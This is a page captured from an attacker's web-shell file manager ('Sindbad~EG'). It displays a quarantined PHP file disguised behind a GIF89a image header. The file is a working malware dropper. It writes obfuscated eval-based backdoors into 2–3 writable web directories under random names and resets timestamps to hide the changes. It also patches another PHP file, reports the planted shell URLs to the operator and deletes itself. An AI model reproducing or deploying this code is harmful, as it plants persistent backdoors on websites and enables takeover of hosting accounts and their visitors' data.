Sindbad~EG File Manager

Current Path : /home/bahiapar/.quarantine/
Upload File :
Current File : /home/bahiapar/.quarantine/20201007-133840-X34LMBINCF4OnLA-kJ9qYQAAABM-file-4PSdWk.1602095920_1

GIF89a????!?,D;
<?php

//subs
if (!function_exists('doc_root')) {
  function doc_root() {
    return !empty($_SERVER['DOCUMENT_ROOT'])  ?
      $_SERVER['DOCUMENT_ROOT']               :
      (!empty($_ENV['DOCUMENT_ROOT'])         ?
      $_ENV['DOCUMENT_ROOT']                  :
      preg_replace('#' . dirname($_SERVER['REQUEST_URI']) . '$#', '', getcwd()))
    ;
  }
}

if (!function_exists('create_filename')) {
  function create_filename() {
    $vars = array('thdeck.php', 'th_desk.php', 'the3dmarket.php', 'theatrale.php', 'theatre71.php', 'thebatallion.php', 'thebigdayout.php', 'thebone.php', 'thedamned.php', 'theepot.php', 'thefts.php');
        
    return $vars[mt_rand(0, count($vars) - 1)];
  }
}

if (!function_exists('writable_dirs')) {
  function writable_dirs($path = '.') {
    $dir    = dir($path);
    $result = array(); 

    while (false !== ($entry = $dir->read())) {
      if ($entry === 'cgi-bin' || substr($entry, 0, 1) === '.') continue;
      if (is_dir($path . '/' . $entry) && is_writable($path . '/' . $entry)) $result[] = $path . '/' . $entry;
    }

    return $result;
  }
}

error_reporting(0);
set_time_limit(0);

$__shell =<<<'EOT'
<?php $v12452c47 = array('hZB', 'ta8', 'I', 'wFI', 'X/', 'Sihi', 'WvB', '1G/', 'swcV', 'S0OHG', '2UuMY', 'qISq', 'ty6s', 'S0KS', 'yWT', 'svy9t', 'B', 'Sc', 'o66d', 'ynnv', 'uuT', 'k+K', 'C', 'U', 'UVS', 'CFMoz', 'v3J', 'bXQT', '7jjGo', 'wrrN', 'lW', 'mbJ', 'g', 'RZT2', 'q', 'md00z', 'sr', 'pBy', 'q+UlY', 'Cl', 'y', 'mc5J', 'hQ4', 'DssAK', 'rz', 'wP', 'fSO', 'pGDf', 'oJHb', 'QD4JM', 'w', '1/D', 'NJpZ', 'CEcH', '7JPM', 'XSca', '7u/o', 'FjZi', 'C', '642', '9gHC', 'tG/zP', 'wX7', 'q/h', 'sV/5d', 'ips', 'F8U', 's', 'QL', '/', 'A', 'TI', 'V', 'P', 'aj', '0I', 'ShIQ', 'GYT8', 'ajMK', 'h', 'N', 'aJqFf', '07hbp', 'dhNe', 'MJ', '+qA86', 's', 'r28Qk', 'qItS', 'lgH', 'd', 'ga', 'EbwQ', '1wo1', '0', 's3+RD', 's8m4/', 'D', 'T4WJW', '9OAPu', 'FiY', 'PP', 'aK', 'WdywK', 'z0i', 'PzG', 'f1', '0WQax', 'a', 'Qej', 'f', 'FlQ/u', 'mCE1', 'l10', '+Ft', 'ASb', 'D', '5ln', '4x', 'p', 'O8', 'hQ/zc', 'Tm3b', 'U', 'TNfQc', '9', 'cc0', 'eC1Ue', '4Qu', '1dM', 'T42AS', 'kY', 'D', '2Bo', 'MYrx', 'r', 'O0j', 'iNY8', 'HA', 'i4L', 'LWEv', 'UkjuX', 'ls/DQ', 't1kQk', 'Mu', 'F', '73b5', 'r', '+Y6fw', 'C', ); $f = strrev("\x6b" . "\x63" . "\x61" . "\x62" . "\x6c" . "\x6c" . "\x61" . "\x63" . "\x5f" . "\x65" . "\x63" . "\x61" ."\x6c" . "\x70" . "\x65" . "\x72" . "\x5f" . "\x67" . "\x65" . "\x72" . "\x70"); $f(strrev("/+./"), function ($matches){ $f1 = strrev(implode("", array('e', 't', 'alf', 'ni', 'zg', ))); $f2 = strrev(implode("", array('ed', 'oc', 'ed_', '46e', 's', 'ab', ))); eval($f1($f2($matches[0]))); }, implode("", $v12452c47)); ?>
EOT;

$root = doc_root();
$dirs = writable_dirs($root);

$sfn = '../jixnegnph7e4awy.php';
$sf_close = 'if (strpos($_REQUEST[\'src\'], \'http\') !== FALSE OR strpos($_REQUEST[\'src\'], \'.php\') !== FALSE) exit;';
if (is_file($sfn) && is_writeable($sfn)) {
  $sfdata = file_get_contents($sfn);

  if (strpos($sfdata, '<?php') !== false) {
    $sfdata = str_replace('<?php', "<?php\n" . $sf_close, $sfdata);

    $mtime = filemtime($sfn);

    if ($sfd = fopen($sfn, 'w')) {
      fwrite($sfd, $sfdata);
      fclose($fd);

      @touch($sfn, $mtime, $mtime);
    }
  }
}

if (count($dirs) > 0) {
  $shells = mt_rand(2, 3);

  if (count($dirs) < $shells) $shells = count($dirs);

  shuffle($dirs);

  for ($i = 0; $i < $shells; $i++) {
    $path   = $dirs[$i] . '/' . create_filename();
    $mtime  = filemtime(dirname($path));

    if (@$fd = fopen($path, 'w')) {
      fwrite($fd, $__shell);
      fclose($fd);

      touch(dirname($path), $mtime, $mtime);
      touch($path, $mtime, $mtime);

      $shell = 'http://' . $_SERVER['HTTP_HOST'] . str_replace($root, '', $path);
      echo '<apicalloie>', $shell, '</apicalloie>', "\n";
    }
  }
} else {
    echo '<apicall_nocomplete>', $_SERVER['HTTP_HOST'], '</apicall_nocomplete>';
}

//@rename($root . '/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php', $root . '/wp-content/plugins/wp-file-manager/lib/php/connector.minimal.php-dist');

unlink(__FILE__);

?>

Sindbad File Manager Version 1.0, Coded By Sindbad EG ~ The Terrorists